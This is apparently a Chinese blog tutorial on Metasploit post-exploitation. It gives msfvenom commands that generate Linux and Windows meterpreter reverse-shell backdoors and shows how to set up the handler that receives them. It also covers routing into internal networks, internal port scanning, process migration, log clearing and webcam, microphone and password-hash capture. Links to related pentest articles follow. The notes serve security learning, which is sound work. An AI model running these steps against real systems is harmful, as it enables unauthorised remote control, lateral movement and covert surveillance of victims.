年初九 天公生

0x034 MSF(美少妇)

  • 启动msf msfconsole

    • 先启动msf依赖的postgresql数据库

      • 初始化数据库 msfdb init (要用普通用户)

  • msf路径 /usr/share

  • 制作后门 msfvenom

    • msfvenom -p payload脚本 lhost=监听/攻击机ip lport=端口 -f 文件类型 -o 文件名

    • linux示例

      • msfvenom -p linux/x64/meterpreter/reverse_tcp lhost 192.168.223.129 lport=4444 -f elf -o shell

    • windows示例

      • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.223.129 lport=4444 -f exe -o shell.exe

  • 远控流程

    • 连接后门

      • 1.制作后门上传到目标机并运行

        • 详见上一条

      • 2.开启msf并进入handle模块

        • use exploit/multi/handler

      • 3.设置payload类型(必须与第一步一致)

        • set payload payload名字

      • 4.设置lhost和lport(与第一步生成的后门一致)

        • set lhost 监听ip
        • set lport 监听端口
      • 5.options查看配置是否正确

      • 6.run运行

        • 进入meterpreter控制终端

          • 执行shell可进入目标机终端

          • run可执行自带脚本或post模块

            • 自带脚本文件在/usr/share/metasploit-framework/script
            • post模块在/usr/share/metasploit-framework/modules/post

      • bg将进程放到后台,sessions查看,sessions 进程id 返回到进程

    • 添加内网路由
      (被控制的目标机只能访问外网不能访问内网,给它添加路由以访问内网)

      • 1.连接上shell之后运行脚本 run get_local_subnets
      • 2.run autoroute -s 内网网段 #例如192.168.223.0/24
      • 3.run autoroute -p

    • 内网扫描

      • 1.用bg把进程放到后台,打开扫描端口模块

        • use auxiliary/scanner/portscan/tcp

      • 2.设置主机段

        • set rhosts 内网网段 (和上一小节一样)

      • 3.设置扫描端口

        • set ports 端口1,端口2

      • 4.设置线程

        • set threads 线程数
      • 5.run 执行脚本

      • back 退出当前模块

    • 端口转发

      • Portfwd

    • 常用命令

      • 核心命令

        • bg
        • sessions

        • load

          • 和use一样

        • run

      • 文件操作

        • cat
        • cd
        • cp
        • dir
        • download
        • upload
        • ls
        • ps
        • search

      • 网络命令

        • if/ipcondig
        • netstat
        • portfwd
        • getproxy

      • 系统命令

        • clearev
        • kill
        • shell
        • powershell
        • sysinfo

      • 用户界面命令

        • screenshot

      • 其他

        • 摄像头

          • 麦克风

            • 密码哈希

    • 进程注入

      • migrate 被注入的进程号

内网渗透之权限维持 - MSF的更多相关文章

  1. 内网渗透之权限维持 - MSF与cs联动

    年初六 六六六 MSF和cs联动 msf连接cs 1.在队伍服务器上启动cs服务端 ./teamserver 团队服务器ip 连接密码 2.cs客户端连接攻击机 填团队服务器ip和密码,名字随便 ms ...

  2. 利用MSF实现三层网络的一次内网渗透

    目标IP192.168.31.207 很明显这是一个文件上传的靶场 白名单限制 各种尝试之后发现这是一个检测文件类型的限制 上传php大马文件后抓包修改其类型为  image/jpeg 上传大马之后发 ...

  3. 【CTF】msf和impacket联合拿域控内网渗透-拿域控

    前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也 ...

  4. MSF 内网渗透笔记

    进入meterpreter模式 在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControl ...

  5. metasploit渗透测试笔记(内网渗透篇)

    x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. r ...

  6. Metasploit 内网渗透篇

    0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. ...

  7. 3.内网渗透之reGeorg+Proxifier

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAxIAAAE2CAIAAAB6BDOVAAAgAElEQVR4Aey9Z5Aex3X327MRGVzkRH ...

  8. 记录一次坎坷的linux内网渗透过程瞎折腾的坑

    版权声明:本文为博主的原创文章,未经博主同意不得转载. 写在前面 每个人都有自己的思路和技巧,以前遇到一些linux的环境.这次找来一个站点来进行内网,写下自己的想法 目标环境 1.linux  2. ...

  9. Linux内网渗透

    Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的.本片文章将从拿到一个Linux shell开始,介绍Linux内网渗 ...

随机推荐

  1. 1059 C语言竞赛 (20 分)

    题目:1059 C语言竞赛 (20 分) C 语言竞赛是浙江大学计算机学院主持的一个欢乐的竞赛.既然竞赛主旨是为了好玩,颁奖规则也就制定得很滑稽: 0.冠军将赢得一份“神秘大奖”(比如很巨大的一本学生 ...

  2. 吴裕雄--天生自然 JAVASCRIPT开发学习:对象 实例(3)

    <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title> ...

  3. Kafka、RabbitMQ、RocketMQ、ActiveMQ

    一.资料文档 Kafka:中.有kafka作者自己写的书,网上资料也有一些.rabbitmq:多.有一些不错的书,网上资料多.zeromq:少.没有专门写zeromq的书,网上的资料多是一些代码的实现 ...

  4. python学习笔记(11)文件操作

    一.读文件 读写文件是最常见的IO操作.Python内置了读写文件的函数,用法和C是兼容的. 读写文件前,我们先必须了解一下,在磁盘上读写文件的功能都是由操作系统提供的,现代操作系统不允许普通的程序直 ...

  5. 升级本地已安装的 Node 和 npm 版本

    Mac升级本地已经安装的NodeJs和Npm到最新版,可以使用一下方式进行升级和更新. 其实windos上升级nodejs也很简单,只需在nodejs官网下载安装最新的msi即可. 值得注意的是安装时 ...

  6. Java POI导出Excel不弹框选择下载路径(下载文件不选择下载路径,默认) Chrome

    在Chrome浏览器中,Java导出Excel文件时,浏览器弹出提示框,需要选择下载路径 在Chrome中的高级设置中,把“下载前询问每个文件的保存位置”去掉就解决了 DEEPLOVE(LC)

  7. 分布式文件系统与HDFS

    HDFS,它是一个虚拟文件系统,用于存储文件,通过目录树来定位文件:其次,它是分布式的,由很多服务器联合起来实现其功能,集群中的服务器有各自的角色. HDFS 的设计适合一次写入,多次读出的场景,且不 ...

  8. 腾讯云服务器(centos7.2)上安装MySQL

    1.到MySQL官网找到相应的版本 https://dev.mysql.com/downloads/repo/yum/ 找到下面的Linux7,即CentOS7(CentOS是Red Hat旗下的)点 ...

  9. python Dom

    Dom(Document) 称为:文档对象模型,是一种用于HTML和XML文档的编程接口.它给文档提供了一种结构化的表示方法,可以改变文档的内容和呈现方式.DOM把网页和脚本以及其他的编程语言联系了起 ...

  10. 重大改革!Python将被加入高考科目!

    未来大学生将分为两种:一种是编程好的人,另一种是编程超好的人. Python 将被纳入高考科目 近期,浙江省信息技术课程改革方案出台,Python 确定进入浙江省信息技术高考,从2018年起浙江省信息 ...